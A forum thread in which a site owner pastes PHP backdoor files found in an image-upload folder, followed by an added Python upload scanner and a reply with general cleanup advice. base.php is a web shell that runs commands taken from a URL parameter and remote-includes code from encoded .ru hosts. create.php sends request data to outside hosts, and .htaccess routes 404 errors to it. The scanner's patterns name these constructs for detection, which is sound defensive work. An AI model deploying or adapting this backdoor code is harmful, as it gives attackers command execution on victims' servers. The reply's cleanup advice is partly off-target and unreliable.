Weird Files Created!


pbjorge12

Hey...I'm a little worried about this odd problem that has begun to show up - Can anyone tell me what it means?

Today I went through a folder of mine on my server called uploadedImages that stores images users uploaded. I check the mime type to prevent other files from being added...The strange thing was I found 2 .php files and a .htaccess file in each subfolder (thumb, smallThumb, and Full).

I will include the "full" folder's files...

base.php
[code]<?php
error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
    if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
    else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
    if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
    if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>
[/code]

Create.php
[code]<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s"; if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>
[/code]

.htaccess
[code]Options -MultiViews
ErrorDocument 404 //uploadedImages/cover/full/create.php
[/code]

Note: Different file names with different content were in each folder...
Note2: The files were created by "nobody" the default apache user...

Is this normal? What is it? What is its purpose?
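
One way to sweep an image-only upload tree for files like the ones posted above, added here as an example and not part of the original thread. The allowed extensions, the constructed sample tree and the pattern labels are assumptions; the patterns are heuristics modelled on constructs visible in the posted files.

```python
import os, re, tempfile

# Assumption: the upload store should only ever hold these image types.
ALLOWED_EXT = {".jpg", ".jpeg", ".png", ".gif"}
MAGIC = (b"\xff\xd8\xff", b"\x89PNG\r\n\x1a\n", b"GIF87a", b"GIF89a")
# Heuristics taken from the posted files; not a complete signature set.
PATTERNS = {
    "php-open-tag": re.compile(rb"<\?php", re.I),
    "include-of-decoded-string": re.compile(rb"include(_once)?\s*\(+\s*base64_decode", re.I),
    "command-from-request": re.compile(rb"(system|exec|passthru|shell_exec)\s*\(\s*\$_(GET|POST|REQUEST)", re.I),
    "htaccess-errordocument-to-php": re.compile(rb"ErrorDocument\s+\d{3}\s+\S+\.php", re.I),
}

def scan_upload_tree(root):
    """Return {relative_path: [reasons]} for files that do not belong in an image store."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            ext = os.path.splitext(name)[1].lower()  # ".htaccess" yields "" here
            reasons = ["unexpected-file-type"] if ext not in ALLOWED_EXT else []
            with open(path, "rb") as fh:
                data = fh.read(1024 * 1024)  # first 1 MiB is enough for these checks
            if ext in ALLOWED_EXT and not data.startswith(MAGIC):
                reasons.append("bad-image-magic")  # image name, non-image content
            reasons += [label for label, rx in PATTERNS.items() if rx.search(data)]
            if reasons:
                findings[os.path.relpath(path, root)] = reasons
    return findings

def build_sample_tree(root):
    """Constructed sample: one valid GIF header plus files shaped like those in the post."""
    full = os.path.join(root, "full")
    os.makedirs(full)
    samples = {
        "ok.gif": b"GIF89a" + b"\x00" * 32,
        "fake.jpg": b'<?php include(base64_decode("ZXhhbXBsZQ==")); ?>',
        "base.php": b'<?php if(isset($_GET["k"])){system($_GET["k"]);} ?>',
        ".htaccess": b"Options -MultiViews\nErrorDocument 404 /uploadedImages/full/create.php\n",
    }
    for name, body in samples.items():
        with open(os.path.join(full, name), "wb") as fh:
            fh.write(body)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        for path, why in sorted(scan_upload_tree(tmp).items()):
            print(path, why)
```

A hit on "bad-image-magic" is the case a declared MIME type check alone does not catch: the name says image, the bytes do not.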


If you find that you haven't done any validation on users uploading the correct file extension, then post the relevant upload code.

If you have done that, read on!

OK, you made me paranoid. Now, what I did 5 minutes ago is check phpMyAdmin for any databases that I didn't know of being mine. You should take these steps.

I had no extra ones, thank god.

Now, what I understand is that if a hacker got your MySQL details then they can use your database for their own needs, and in some cases also use a folder you didn't know about, but the best practice is to check the database entries, and if they're all yours, lol... you're OK, you can sleep tonight, OK.

But

In the worst situation, where a person has leeched onto your database, you have to reset the passwords on all your scripts and database, OK.

And then delete any unknown folders and files.

I would suggest a fresh copy of everything, OK.

Scary. Good luck.